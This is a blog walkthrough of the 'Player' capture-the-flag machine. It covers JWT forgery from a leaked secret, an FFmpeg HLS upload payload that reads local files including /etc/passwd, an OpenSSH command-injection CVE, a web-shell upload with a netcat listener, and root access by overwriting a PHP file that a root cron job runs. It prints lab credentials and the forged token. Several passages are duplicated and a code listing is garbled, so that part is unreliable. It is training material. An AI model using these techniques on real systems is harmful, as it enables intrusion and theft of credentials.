Hi guys,here is my writeup about player machine,this machine is quite hard and really good,its ip is 10.10.10.145 put it in /etc/hosts and jump in.
Nmap scan
We got the machine's ports,now going to explore http service .When i try open it's page, i got 403 forbidden status.
Nothing to check in here,turn to fuzzing it's paths via wfuzz tools.After running wfuzz i got only 1 path it's launcher,note it then leave a side,then i going to scan vhosts by wfuzz and got 3 subdomains.
Put them into /etc/hosts and check them.
dev.player.htb
staging.player.htb
chat.player.htb
Nothing much in here,except staging.player.htb,do some request on burp with staging domain,i got error
note and leave it,back to player.htb and request the launcher path.
The GET request when load the page gave me some interesting:
/launcher/dee8dc8a47256c64630d803a4c40786e.php
Then i tried to enter some email and it also gave me new thing:
/launcher/dee8dc8a47256c64630d803a4c40786c.php
I did test some few request ,it gives a 302 found response as we see on the browser.
Have checked some info from chat we can see exposing the source code was mentioned,by that i did google about source code disclosure.This happen when they did not delete the backup file or the text editor left the files and it was not deleted later.After we added the ~ at the end of the /launcher/dee8dc8a47256c64630d803a4c40786c.php and send the request in the burp we can see the source code of the page.
dee8dc8a47256c64630d803a4c40786c.php
<?php
require 'vendor/autoload.php';
use \Firebase\JWT\JWT;
if (isset($_COOKIE[ "access" ]))
{
$ key = '_S0_R@nd0m_P@ss_';
$decoded = JWT::decode($_COOKIE[ "access" ], base64_decode(strtr($ key ,
'-_', '+/')), ['HS256']);
if ($decoded->access_code ===
"0E76658526655756207688271159624026011393" )
{
header( "Location: 7F2xxxxxxxxxxxxx/" );
}
else
{
header( "Location: index.html" );
}}
else
{
$token_payload = [
'project' => 'PlayBuff',
'access_code' => 'C0B137FE2D792459F26FF763CCE44574A5B5AB03'
];
$ key = '_S0_R@nd0m_P@ss_';
$jwt = JWT::encode($token_payload, base64_decode(strtr($ key , '-_',
'+/')), 'HS256');
$cookiename = 'access';
setcookie( 'access',$jwt, time() + (86400 * 30), "/");
header( "Location: index.html" );
}
?>
From the code we get a hint that JSON Web Tokens (JWT), we can use the php code to
generate a token which will have much more privilege.
We can use the jwt.io to decode the encoded access key.
generate a token which will have much more privilege.
We can use the jwt.io to decode the encoded access key.
The decoded token is C0B137FE2D792459F26FF763CCE44574A5B5AB03
In order to craft a payload token which will have more privilege is by changing the access code
and then check mark the secret base64 encoded
From the php source code we can see the Key is S0_R@nd0m_P@ss and the access code
is
0E76658526655756207688271159624026011393 .
Using these both we generated an access key which we can use in our get request.
In order to craft a payload token which will have more privilege is by changing the access code
and then check mark the secret base64 encoded
From the php source code we can see the Key is S0_R@nd0m_P@ss and the access code
is
0E76658526655756207688271159624026011393 .
Using these both we generated an access key which we can use in our get request.
New Access Key:
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwcm9qZWN0IjoiUGxheUJ1ZmYiLCJhY2Nlc3
NfY29kZSI6IjBFNzY2NTg1MjY2NTU3NTYyMDc2ODgyNzExNTk2MjQwMjYwMTEzOTMifQ.VXuTKq
w__J4YgcgtOdNDgsLgrFjhN1_WwspYNf_FjyE
NfY29kZSI6IjBFNzY2NTg1MjY2NTU3NTYyMDc2ODgyNzExNTk2MjQwMjYwMTEzOTMifQ.VXuTKq
w__J4YgcgtOdNDgsLgrFjhN1_WwspYNf_FjyE
When we place a GET request on the burp we get a response back with a specific location as
given below:
given below:
HTTP/1.1 302 Found
Date: Fri, 11 Oct 2019 21:27:17 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.26
Location: 7F2dcsSdZo6nj3SNMTQ1/
Content-Length: 0
Connection: close
Content-Type: text/html
Date: Fri, 11 Oct 2019 21:27:17 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.26
Location: 7F2dcsSdZo6nj3SNMTQ1/
Content-Length: 0
Connection: close
Content-Type: text/html
If we browse to that location we see a page using which we can upload files. http://player.htb/launcher/7F2dcsSdZo6nj3SNMTQ1/
It says that it compress and secure our media.
I did a test upload of an image .jpg file and it gave me an output in .avi format.It is a FFMpeg video format, we can search a FFMpeg payload.I came across a FFMpeg HLS Vulnerability and swisskyrepo on github was really helpful in creating our payload.https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/CVE%20Ffmpeg%20HLS.
I did a test upload of an image .jpg file and it gave me an output in .avi format.It is a FFMpeg video format, we can search a FFMpeg payload.I came across a FFMpeg HLS Vulnerability and swisskyrepo on github was really helpful in creating our payload.https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/CVE%20Ffmpeg%20HLS.
We have created our payload using the swisskyrepo and created a passwd.avi which we will
upload it to the website.
upload it to the website.
python3 gen_xbin_avi.py file:///etc/passwd passwd.avi
After uploading it compressed and secured it and made me download the avi file.
When played we were able to see the passwd.avi file of the player.htb
When played we were able to see the passwd.avi file of the player.htb
python3 gen_avi.py file:///etc/passwd passwd.avi
From the initial Enumeration there are have 2 file that we want to read service_config and fix.php
python3 gen_avi.py file:///var/www/backup/service_config service_config.avi
username = 'telegen',
password = 'd-bC|jC!2uepS/w'
At here ,we can get cred,i have tried that cred with ssh on port 22 but failed,then i tried on port 6686 which is also know as other ssh service,but it was other environment shell and leak commands so i couldn't get flag in here.Find another ways by google i got interesting CVE about openssh service running on the machine.Tried that script we can able to injection command and able to get user flag.
We able to read file now we also check what's inside /var/www/staging/ fix.php
which had had been showed by staging.player.htb before.
which had had been showed by staging.player.htb before.
#> .readfile /var/www/staging/fix.php
DEBUG:__main__:auth_cookie: 'xxxx\nsource /var/www/staging/fix.php\n'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:<?php
class
protected
protected
protected
public
return
}
public
if($result
static::passed($test_name);
}
static::failed($test_name);
}
}
public
if($result
static::failed($test_name);
}
static::passed($test_name);
}
}
public
if(!$username){
$username
$password
}
//modified
//for
//fix
//peter
//CQXpm\z)G5D#%S$y=
}
public
if($result
static::passed($test_name);
}
static::failed($test_name);
}
}
public
echo
echo
echo
}
private
echo
static::$failed++;
}
private
static::character(".");
static::$passed++;
}
private
echo
static::$last_echoed
}
private
if(static::$last_echoed
echo
static::$last_echoed
}
}
Look careful we can get other cred,note it for later
peter:CQXpm\z)G5D#%S$y=
//modified
//for
//fix
//peter
//CQXpm\z)G5D#%S$y=
//for
//fix
//peter
//CQXpm\z)G5D#%S$y=
Back to enum and escalate to root.We already knew the machine have vhosts so let's check the apache conf file to get info,usual it located at /etc/apache2/sites-available/000-default.conf,make payload and send it.
python3 gen_avi.py file:///etc/apache2/sites-available/000-default.conf apache.avi
At now we know that dev.player.htb used document root at /var/www/demo,so let's explore it!
python3 gen_avi.py file:///var/www/demo/index.php devindex.avi
We got cred we knew dev.player.htb path so let jump inside,after logging we can see the site like below
Play around with it a bit,now i'm going to create a new project named pis with absolute path /var/www/demo/shell.Since it just allowed us to create absolute path with /var/www/demo or /var/www/demo/home so follow it i created a project and able to upload my shell
Start listen on nc and get connect from the box,to triggered the shell we must follow dev.player.htb/your_project/your_shell.php and i got shell as www-data user
At usual i checked with all commands for privilege escalation,also i used pspy64 to watch processes running on the box.From pspy64 result we can get some interesting process
2020/01/05 11:47:02 CMD: UID=0 PID=30530 | /bin/sh -c /usr/bin/php /var/lib/playbuff/buff.php > /var/lib/playbuff/error.log
This process run as root,let see what is inside /var/lib/playbuff/buff.php
At second lines we can see it include another php from /var/www/html/launcher
include("/var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php");
Check permission of /var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php
www-data@player:/var/lib/playbuff$ ls -la /var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php
4630d803a4c40786g.phplauncher/dee8dc8a47256c6
-rw-r--r-- 1 www-data www-data 286 Mar 25 2019 /var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php
We can overwrite it so i created file with same name in my local and put malicious code to get shell,then overwrite it via wget and wait you can get root shell.
This really a good box,let's me know how did you 'hack' this box ? and give me your personal opinion about this box.Also thank for reading!
0 comments:
Post a Comment